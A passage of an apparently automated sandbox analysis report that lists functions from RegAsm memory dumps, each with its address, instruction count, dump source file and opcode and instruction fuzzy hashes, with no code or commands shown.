                                                                                                                                    • Opcode Fuzzy Hash: 70c280bc57518590c96686c1ed0184d1e3ecc54a7e58cfcb256c21316db01b89
                                                                                                                                    • Instruction Fuzzy Hash: 39A15B346402069FC745EF68C584D5ABBF2FF88310B118AA8D55A8B776DB30FD89CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 055393B8 Relevance: .2, Instructions: 230COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9ddd3ff42be979540607638964cf9144b3ad9d2988bc3ae9b9fdcca310fc06bd
                                                                                                                                    • Instruction ID: 7723362b1f2ff6b2fcd19932cdc9f1cd6becd23918aafe3318f2ab2e9c6dc407
                                                                                                                                    • Opcode Fuzzy Hash: 9ddd3ff42be979540607638964cf9144b3ad9d2988bc3ae9b9fdcca310fc06bd
                                                                                                                                    • Instruction Fuzzy Hash: 41A149346402069FC745EF68C584D5ABBF2FF883107118AA8D55A8B776DB30ED89CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169AA08 Relevance: .2, Instructions: 230COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d113ca04ad740204b74fba6fd75532875ed615e4f4248cd3b3272cf5aff92e55
                                                                                                                                    • Instruction ID: 986f8b1b1e167b28f47263733ff49c3b0e29dbdcf36855694bbfe72766b3e42a
                                                                                                                                    • Opcode Fuzzy Hash: d113ca04ad740204b74fba6fd75532875ed615e4f4248cd3b3272cf5aff92e55
                                                                                                                                    • Instruction Fuzzy Hash: 21815A30300A129FEF15EF6CC99576A77EAFF95204F140A29E512CB394DB34E891CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169AE30 Relevance: .2, Instructions: 198COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7df2ad681f224504fedf018bf54ce7bdcc415cf092febbba46937027a3f8104a
                                                                                                                                    • Instruction ID: 8bf7cf68369cb0665e0dadb3f1e5f3c2b205902ea7a82a8e1c488724d8f6075b
                                                                                                                                    • Opcode Fuzzy Hash: 7df2ad681f224504fedf018bf54ce7bdcc415cf092febbba46937027a3f8104a
                                                                                                                                    • Instruction Fuzzy Hash: 377146B0A00B058FDB24DF69D94579ABBF5FF88200F00892DD18ADBB50DB75E845CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 055372E0 Relevance: .2, Instructions: 168COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c7ce92eea678a98a242ef5a0d61937cc5707166757938bfbe1880a1b036fcfe4
                                                                                                                                    • Instruction ID: cb63b9a71a809cba0ebb68299eb61f3ed3a1175b47afc0c443793be89eaa76a9
                                                                                                                                    • Opcode Fuzzy Hash: c7ce92eea678a98a242ef5a0d61937cc5707166757938bfbe1880a1b036fcfe4
                                                                                                                                    • Instruction Fuzzy Hash: B571CEB4D01219CFCB14CFAAC584A9DBBF2FF89310F209569D819AB355DB34A982CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068563FB Relevance: .2, Instructions: 162COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 409a3b0380008a85415d263647798264673811c885d634a39a153e4dc0d422b0
                                                                                                                                    • Instruction ID: e1daa5017ff2146de2f08cf2d4ead5c416524e0cc4564dce729feacdab3fc2dd
                                                                                                                                    • Opcode Fuzzy Hash: 409a3b0380008a85415d263647798264673811c885d634a39a153e4dc0d422b0
                                                                                                                                    • Instruction Fuzzy Hash: AD517F31B002059FCB50DF69D84499EBBF6FF88324B5585AAE905DB322E731EC45CBA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169F6E0 Relevance: .2, Instructions: 154COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2033f46d47e0a42635e7a113374c5670fd22c32fdcaec672c6157ddfeac79155
                                                                                                                                    • Instruction ID: 3883e8a17b81a23754752472c4426aebd3f019287bb4fb96354279d7b724d367
                                                                                                                                    • Opcode Fuzzy Hash: 2033f46d47e0a42635e7a113374c5670fd22c32fdcaec672c6157ddfeac79155
                                                                                                                                    • Instruction Fuzzy Hash: F8513635A003058FDB15CF68D988BADBBF6BF49304F2145AAE40ADB391CB74AD45CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553E138 Relevance: .2, Instructions: 153COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a1ef1a0b0a077866dd3ce6905d6e874979ccef8711b1f35a984b697c5da4f276
                                                                                                                                    • Instruction ID: eee97a648a43cdacb80f8d9abf35dd7b0dcec956effe2c3e81e8d8918a52c4b2
                                                                                                                                    • Opcode Fuzzy Hash: a1ef1a0b0a077866dd3ce6905d6e874979ccef8711b1f35a984b697c5da4f276
                                                                                                                                    • Instruction Fuzzy Hash: CD41F6327092504FC722DB68D882D6BBFEAFF8532031985AAE44DCF255D630EC45C791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169DDA1 Relevance: .2, Instructions: 151COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 817f945beee8648d60439d42edf497d361c8a110103c81d98bd06e88f9251922
                                                                                                                                    • Instruction ID: 2e3f607babbe09e20e012f93a080f2cabe60e5b1b0e1d587910e33c65e16c9ef
                                                                                                                                    • Opcode Fuzzy Hash: 817f945beee8648d60439d42edf497d361c8a110103c81d98bd06e88f9251922
                                                                                                                                    • Instruction Fuzzy Hash: CB514B706002198FDF25EF68C894BA9BBB6FF94305F1440A9D50AAB362DB71AD85CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06857D58 Relevance: .1, Instructions: 147COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3098e7d02897c5f9cd59cca49ddb5579ae8c6782c8c1eeff7c97d744b3a0aecc
                                                                                                                                    • Instruction ID: 51c5473b834bea1024b316229d2ec5b8c903431921796ed43549bc7aa7061f65
                                                                                                                                    • Opcode Fuzzy Hash: 3098e7d02897c5f9cd59cca49ddb5579ae8c6782c8c1eeff7c97d744b3a0aecc
                                                                                                                                    • Instruction Fuzzy Hash: 23512371E003589FDB54CFA9D881BDEBBF6AB48710F14C42AE815EB254DB74A846CF80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 068334D8 Relevance: .1, Instructions: 143COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881293459.0000000006830000.00000040.00000800.00020000.00000000.sdmp, Offset: 06830000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6830000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9af337bd9e170b4e0728eee03b3cc2924512816b9d6e48cc50c46b2a3140be4b
                                                                                                                                    • Instruction ID: 701093d00c3cde0356ebd8ab5afcb21efcfb33e83b211c32073df1b81d3074e2
                                                                                                                                    • Opcode Fuzzy Hash: 9af337bd9e170b4e0728eee03b3cc2924512816b9d6e48cc50c46b2a3140be4b
                                                                                                                                    • Instruction Fuzzy Hash: CC515635B502189FCB44DF69C88499EBBF2FF89714B158069EA06EB361DB31EC45CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553211D Relevance: .1, Instructions: 142COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 59af73af3ad51d81c5b5fddee096a54a29e3608df58b5330fda2b9f48b116f15
                                                                                                                                    • Instruction ID: c5d6f9e374bd5e9813ab403a5fa1e631e06feb10f2516a018bf5d2be78c64cfd
                                                                                                                                    • Opcode Fuzzy Hash: 59af73af3ad51d81c5b5fddee096a54a29e3608df58b5330fda2b9f48b116f15
                                                                                                                                    • Instruction Fuzzy Hash: FB519635E1071A9FCB00DBE0D8549DDFB7AFF89300F248215F519AB2A1DB30A946CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553D22F Relevance: .1, Instructions: 141COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 868ce7deea2f5798d65daace210533b268f7c12771fea35463133dec93771901
                                                                                                                                    • Instruction ID: bfa3f90c82cb79dbde0b52665757f65fa56c9dbb23acb2659f7049762becfce1
                                                                                                                                    • Opcode Fuzzy Hash: 868ce7deea2f5798d65daace210533b268f7c12771fea35463133dec93771901
                                                                                                                                    • Instruction Fuzzy Hash: ED519B312403059FC316EB78D858A5ABBE7FFC4250B148A2DD146CB7A5DB31EC4ACBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169DDE2 Relevance: .1, Instructions: 134COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7d86f9b3958e0ea6f893236bcd53f91b72274a74ae72594d090bf98c251d1732
                                                                                                                                    • Instruction ID: 4d62975a796efec399e061c79a7555fd96becd1e8a8fe65517b74a9a9c8ef431
                                                                                                                                    • Opcode Fuzzy Hash: 7d86f9b3958e0ea6f893236bcd53f91b72274a74ae72594d090bf98c251d1732
                                                                                                                                    • Instruction Fuzzy Hash: EE512A70A00219CFDB24EF68C884BADBBB6FF94305F1544A9D50AAB361CB75AD85CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553B818 Relevance: .1, Instructions: 131COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3d33143b837cdfb01b22731e9a1edc73ed2e571fb542e46696765a0cf0bfc515
                                                                                                                                    • Instruction ID: 5f23ccbff579f83d78896a23699677204c9770f3136be48f39dc83079340cc62
                                                                                                                                    • Opcode Fuzzy Hash: 3d33143b837cdfb01b22731e9a1edc73ed2e571fb542e46696765a0cf0bfc515
                                                                                                                                    • Instruction Fuzzy Hash: FA415D71A002069FCB00DB58C980AAEFBF6FF84310F14C929D5199B365DB31ED46CB90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169D0A8 Relevance: .1, Instructions: 131COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 15a4b75440f81fa52b0b4da3dec73a9ee8052a6181be168cfa1cc81e5dc6bf27
                                                                                                                                    • Instruction ID: 459f3a30e8a6e256612344d5c16ce568be179dc9381c7fcad23f29d34599205a
                                                                                                                                    • Opcode Fuzzy Hash: 15a4b75440f81fa52b0b4da3dec73a9ee8052a6181be168cfa1cc81e5dc6bf27
                                                                                                                                    • Instruction Fuzzy Hash: 195169B09002498FDB44CFA9D948BDEBFF5EF48314F24846AE119A7360DB349884CB65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06857D4C Relevance: .1, Instructions: 130COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 61e375c20537ec2b2821aed3a8bdb01397e4065e958559c8162e0f6efcedfad8
                                                                                                                                    • Instruction ID: 0370a43d937da49d5526ccaaea50576d32853b1d55dc7e990e78b407c7fbb66c
                                                                                                                                    • Opcode Fuzzy Hash: 61e375c20537ec2b2821aed3a8bdb01397e4065e958559c8162e0f6efcedfad8
                                                                                                                                    • Instruction Fuzzy Hash: B65135B0E003599FDB54CFA9D885BDEBBF5AB48704F14C42AE805EB254DB749845CF81
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05537510 Relevance: .1, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 53696beb639991f9d7efd927a866cdb151cfbacb816550cd3338d5070a17310e
                                                                                                                                    • Instruction ID: 7741c6e9e12a53d6416ce4689f62f022349a4795b279ff73ec2eff06602f003e
                                                                                                                                    • Opcode Fuzzy Hash: 53696beb639991f9d7efd927a866cdb151cfbacb816550cd3338d5070a17310e
                                                                                                                                    • Instruction Fuzzy Hash: 0251F270E00308DFDB08DFA5D855ADDBBB2FF89304F60842AE005AB2A4DB399942CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553F8FF Relevance: .1, Instructions: 129COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1b27814e1bc48008727f63f1c9395c73eabf7773ebb6b0b6bb0ee964532fd6dc
                                                                                                                                    • Instruction ID: bc072e499353095bb512780cd357e0186e584a5f21807abf8022f938bd79497f
                                                                                                                                    • Opcode Fuzzy Hash: 1b27814e1bc48008727f63f1c9395c73eabf7773ebb6b0b6bb0ee964532fd6dc
                                                                                                                                    • Instruction Fuzzy Hash: 5C416D31D087858FC712AFB8D8641EABB71FF86310F00456FD0CAAB652EB716945C791
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553BE50 Relevance: .1, Instructions: 128COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 03637543269f46ab8d3f9937e50a8017a8d3e15640c2e1328f7f8e225751080b
                                                                                                                                    • Instruction ID: 08282d32aceee00d32730cc23e577d6c3e550df8bdbfbdedebea75ac41fc2aee
                                                                                                                                    • Opcode Fuzzy Hash: 03637543269f46ab8d3f9937e50a8017a8d3e15640c2e1328f7f8e225751080b
                                                                                                                                    • Instruction Fuzzy Hash: AE413C312407025FE395EB28D850A5ABBE6FFC1310B448A6DC25A8F666DB70BD49CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0169D0B8 Relevance: .1, Instructions: 128COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1861004317.0000000001690000.00000040.00000800.00020000.00000000.sdmp, Offset: 01690000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_1690000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2bbf28645cb07f61f89f530eeb912e9395945a56ac7a5ca5175a450d51a2089c
                                                                                                                                    • Instruction ID: 9a0c34412a8ed4a5c78ad70b64d273a34e56a0ba45ccdba617f2062e03cd4870
                                                                                                                                    • Opcode Fuzzy Hash: 2bbf28645cb07f61f89f530eeb912e9395945a56ac7a5ca5175a450d51a2089c
                                                                                                                                    • Instruction Fuzzy Hash: 045168B09002098FEB14DFA9D948BDEBFF5EF48314F20846AE119A7360DB749884CF65
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 06856E73 Relevance: .1, Instructions: 128COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: cd9d460a89f239783928734989d483463a101cea8ab4d8459874c131cc659c4a
                                                                                                                                    • Instruction ID: 7a228670f154eb0a9c5dee5c4f4c46f85004b0e6d2ecba45328b036f8b357f91
                                                                                                                                    • Opcode Fuzzy Hash: cd9d460a89f239783928734989d483463a101cea8ab4d8459874c131cc659c4a
                                                                                                                                    • Instruction Fuzzy Hash: F5512A71505B848FC726CF2EC540897FFF4AF99200704896EE9DA87B22D274E949CB61
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 05537520 Relevance: .1, Instructions: 122COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2b58e99f7f8c1d850ba339e5d8c162906feaad734c842382acf74815706264c0
                                                                                                                                    • Instruction ID: 95b3bc16b55c42854c4cab2f251e584e316d159009bd90109df750cf1ea99bf6
                                                                                                                                    • Opcode Fuzzy Hash: 2b58e99f7f8c1d850ba339e5d8c162906feaad734c842382acf74815706264c0
                                                                                                                                    • Instruction Fuzzy Hash: B051C070E01308DFDB18DFA5D855A9DBBB2FF89305F20842AE405AB2A4DB399942CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07ACF930 Relevance: .1, Instructions: 120COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1890474143.0000000007AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AC0000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_7ac0000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5e1f6d47c1f0756eec25e16009a24b037773dc54994c89cbe4d5ddbcc96d3328
                                                                                                                                    • Instruction ID: eb1e05069ff9beb47b04fdecf26e6bf829c0572b8ec7175824e28895fb323332
                                                                                                                                    • Opcode Fuzzy Hash: 5e1f6d47c1f0756eec25e16009a24b037773dc54994c89cbe4d5ddbcc96d3328
                                                                                                                                    • Instruction Fuzzy Hash: 944115B2E0021A9FDB14DFA5D990ADEFBB6BF84710F148129E415B7240DB70AD46CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553D258 Relevance: .1, Instructions: 118COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: dcb749531bdc9c8ec861d72b206cc82e6ddd487b97c1d59f91b74de82d136f17
                                                                                                                                    • Instruction ID: 317e5ae9dc9af371b9593bf66afaf74826447bb0aec5b4dd4b9df7ba5381bdde
                                                                                                                                    • Opcode Fuzzy Hash: dcb749531bdc9c8ec861d72b206cc82e6ddd487b97c1d59f91b74de82d136f17
                                                                                                                                    • Instruction Fuzzy Hash: 9F414B312402059FD355AB78D458A2EBBE7FBC8250B148A2DD247CB7A4DF71EC4ACB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0685371A Relevance: .1, Instructions: 114COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1881366318.0000000006850000.00000040.00000800.00020000.00000000.sdmp, Offset: 06850000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_6850000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: de8f04e1a946914d7b202aba8547ab6471b761a7a2883debbc79bcd782090457
                                                                                                                                    • Instruction ID: 46e245f1a5f02d82bf239287e7b2a8ee74a4080a73763241f5206d84983d117a
                                                                                                                                    • Opcode Fuzzy Hash: de8f04e1a946914d7b202aba8547ab6471b761a7a2883debbc79bcd782090457
                                                                                                                                    • Instruction Fuzzy Hash: C6415875A006458FDB55CF18C48096EBBF2FF89390B16C969E856EB361E730E801CB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0553BE60 Relevance: .1, Instructions: 112COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000006.00000002.1878737461.0000000005530000.00000040.00000800.00020000.00000000.sdmp, Offset: 05530000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_6_2_5530000_RegAsm.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e9cf6bbc7933f303311f89b58024f2fd47609307f72b2e6e40a0b3541b41db35
                                                                                                                                    • Instruction ID: 0e5658e534239c14c33e1b9ecd75681335375ef637ed2e070f9f38ac9b49933d
                                                                                                                                    • Opcode Fuzzy Hash: e9cf6bbc7933f303311f89b58024f2fd47609307f72b2e6e40a0b3541b41db35
                                                                                                                                    • Instruction Fuzzy Hash: 8D4118302407025FE395FB29D944A5ABBE6FFC1310F50CA2DC2568F666DB70AD49CB92
                                                                                                                                    Uniqueness

